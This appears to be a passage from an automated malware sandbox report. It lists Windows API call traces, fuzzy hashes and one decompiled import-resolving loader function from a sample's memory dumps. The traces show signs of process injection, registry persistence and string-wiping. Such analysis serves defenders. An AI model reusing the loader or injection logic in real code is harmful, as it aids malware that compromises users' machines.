    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
